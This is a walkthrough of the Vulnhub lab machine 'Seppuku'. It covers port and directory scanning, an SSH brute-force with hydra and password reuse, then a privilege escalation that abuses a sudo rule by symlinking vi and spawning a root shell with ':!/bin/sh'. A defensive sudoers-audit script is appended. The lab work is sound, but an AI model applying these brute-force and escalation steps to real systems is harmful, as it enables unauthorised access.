[VLN] Seppuku

Today we are going to hack the Vulnhub machine called Seppuku. You can download it from the following link: Seppuku

Enumeration


We start with an nmap scan to see which ports are open.

sml@m0nique:~$ nmap -A -p- 192.168.112.132
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 22:31 CEST
Nmap scan report for 192.168.112.132
Host is up (0.0010s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title:  404 Not Found
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_ssl-date: 2020-05-18T20:32:26+00:00; 0s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m59s, deviation: 2h00m00s, median: 0s
|_nbstat: NetBIOS name: SEPPUKU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2020-05-18T16:32:22-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-18T20:32:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.21 seconds

We see that it has several open ports. Let's take a look at port 7601 to see whether we find anything interesting.

sml@m0nique:~$ gobuster dir -u http://192.168.112.132:7601 -w /usr/share/wordlists/dirb/big.txt -x php,txt,htm,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.132:7601
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,htm,html
[+] Timeout:        10s
===============================================================
2020/05/18 22:35:58 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.htm (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.htm (Status: 403)
/.htaccess.html (Status: 403)
/a (Status: 301)
/b (Status: 301)
/c (Status: 301)
/ckeditor (Status: 301)
/d (Status: 301)
/database (Status: 301)
/e (Status: 301)
/f (Status: 301)
/h (Status: 301)
/index.html (Status: 200)
/keys (Status: 301)
/production (Status: 301)
/q (Status: 301)
/r (Status: 301)
/secret (Status: 301)
/server-status (Status: 403)
/stg (Status: 301)
/t (Status: 301)
/w (Status: 301)
===============================================================
2020/05/18 22:36:08 Finished
===============================================================

We find two interesting directories: /keys and /secret. In http://192.168.112.132:7601/keys there is a file called private... We download it and set its permissions to 600, because it looks like an SSH key.

sml@m0nique:~$ wget http://192.168.112.132:7601/keys/private -O private.pkey
sml@m0nique:~$ chmod 600 private.key

At http://192.168.112.132:7601/secret/ we can see the file password.lst. It looks like a wordlist, so we download it.

sml@m0nique:~$ wget http://192.168.112.132:7601/secret/password.lst -O psecret.txt

We brute-force SSH for the user seppuku with the wordlist we just found :)

sml@m0nique:~/$ hydra -l seppuku -P psecret.txt 192.168.112.132 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-18 23:26:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 93 login tries (l:1/p:93), ~6 tries per task
[DATA] attacking ssh://192.168.112.132:22/
[22][ssh] host: 192.168.112.132   login: seppuku   password: eeyoree
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-18 23:26:43

We have found the password for seppuku, so we log in.

Low Shell



sml@m0nique:~/$ ssh seppuku@192.168.112.132 bash
seppuku@192.168.112.132's password: 
seppuku@seppuku:~$ id
uid=1000(seppuku) gid=1000(seppuku) 
groups=1000(seppuku),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

seppuku@seppuku:~$ sudo -l
Matching Defaults entries for seppuku on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User seppuku may run the following commands on seppuku:
    (ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/

We see that it can run one command with sudo, which symlinks the root directory into /tmp. We run it...

seppuku@seppuku:~$ /usr/bin/ln -sf /root/ /tmp/

We keep exploring the system.

seppuku@seppuku:~$ ls -la
total 28
drwxr-xr-x 3 seppuku seppuku 4096 May 18 16:30 .
drwxr-xr-x 5 root    root    4096 May 13 04:50 ..
-rw-r--r-- 1 seppuku seppuku  220 May 13 00:28 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3526 May 13 00:28 .bashrc
drwx------ 3 seppuku seppuku 4096 May 13 10:05 .gnupg
-rw-r--r-- 1 root    root      20 May 13 04:47 .passwd
-rw-r--r-- 1 seppuku seppuku  807 May 13 00:28 .profile
seppuku@seppuku:~$ cat .passwd
12345685213456!@!@A

The content of the .passwd file is probably a password, so we check which users exist on the system in order to try it.

seppuku@seppuku:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
seppuku:x:1000:1000:seppuku,,,:/home/seppuku:/bin/rbash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
samurai:x:1001:1002:,,,:/home/samurai:/bin/rbash
tanto:x:1002:1003:,,,:/home/tanto:/bin/rbash

We try samurai:

seppuku@seppuku:~$ su samurai
su samurai
Password: 12345685213456!@!@A
samurai@seppuku:~$ id
uid=1001(samurai) gid=1002(samurai) groups=1002(samurai)

Now, as samurai, let's see what we can do...

samurai@seppuku:~$ sudo -l

Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

sudo lets us run one command, but it lives inside the home directory of the user tanto... We leave this shell open as samurai, open a new one and check whether the "private" key we found earlier lets us log in as tanto.

sml@m0nique:~/$ ssh -i private tanto@192.168.112.132
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 13 10:53:17 2020 from 192.168.1.48
tanto@seppuku:~$

Privilege Escalation


Good, we're in. We create a symbolic link to "vi" at /home/tanto/.cgi_bin/bin. That way, when samurai runs sudo, what actually executes as root is vi: it can open the "root.txt" file, and from inside vi we can get a root shell by running "sh".

tanto@seppuku:~$ bash -i
tanto@seppuku:~$ mkdir .cgi_bin
tanto@seppuku:~$ cd .cgi_bin
tanto@seppuku:~/.cgi_bin$ ln -s /bin/vi bin

Now that we have done our "work" as tanto, we run the following as samurai:

samurai@seppuku:~$ sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/../tmp/root/root.txt

The root.txt file with the flag opens in the vi editor. If we want a root shell, inside vi we run:

:!/bin/sh

And we're root :)
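The two sudo rules shown above (seppuku's `ln -sf /root/ /tmp/` and samurai's `/../../../../../../home/tanto/.cgi_bin/bin /tmp/*`) are the misconfiguration this whole chain depends on. As an added example that is not part of the original post, here is a small Python audit script that flags exactly those patterns in sudoers-style rules: ".." components in the command path, a command outside the system binary directories, wildcard arguments (which sudo also matches against ".." components) and a root-run "ln -s". The sudoers excerpt embedded in it is constructed, not taken from the machine.

```python
import os
import re
import shlex

# Constructed sudoers excerpt: the two rules "sudo -l" shows on Seppuku plus a
# benign control rule. It is not a file taken from the machine.
SAMPLE_SUDOERS = """\
seppuku ALL=(ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/
samurai ALL=(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
backup  ALL=(ALL) NOPASSWD: /usr/bin/rsync -a /var/www/ /srv/backup/
"""

# user host=(runas) [NOPASSWD:] command [args]   (single-command form only)
RULE_RE = re.compile(r"^(\S+)\s+\S+=\s*(?:\([^)]*\))?\s*(?:NOPASSWD:|PASSWD:)?\s*(.+)$")
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/local/bin/", "/usr/local/sbin/")

def audit_command(cmd):
    """Findings for one 'binary args...' command spec; an empty list means nothing flagged."""
    parts = shlex.split(cmd)
    if not parts:
        return []
    binary, args = parts[0], parts[1:]
    norm = os.path.normpath(binary)  # collapses the leading /../../.. chain
    findings = []
    if ".." in binary.split("/"):
        findings.append(f"'..' in command path; it really runs {norm}")
    if not norm.startswith(SYSTEM_DIRS):
        findings.append(f"{norm} is outside the system binary directories (user-writable?)")
    if any(ch in arg for arg in args for ch in "*?["):
        findings.append(f"wildcard argument '{' '.join(args)}' also matches '..' path components")
    if norm in ("/bin/ln", "/usr/bin/ln") and any(a.startswith("-") and "s" in a[1:] for a in args):
        findings.append("root-run 'ln -s' can expose a privileged directory through a symlink")
    return findings

def audit_sudoers(text):
    """Return {user: [findings]} for every flagged rule in a sudoers-style text."""
    report = {}
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m or line.lstrip().startswith(("#", "Defaults")):
            continue
        user, cmdspec = m.groups()
        for cmd in cmdspec.split(","):
            found = audit_command(cmd.strip())
            if found:
                report.setdefault(user, []).extend(found)
    return report

if __name__ == "__main__":
    for user, items in audit_sudoers(SAMPLE_SUDOERS).items():
        print(user)
        for item in items:
            print("  -", item)
```

Feed it the concatenated contents of /etc/sudoers and /etc/sudoers.d/*; the fix for a rule like samurai's is an absolute path to a root-owned binary with fixed arguments and no wildcards.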

root.txt



# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
{SunCSR_Seppuku_2020_X}

End


And with that we are root on the machine :)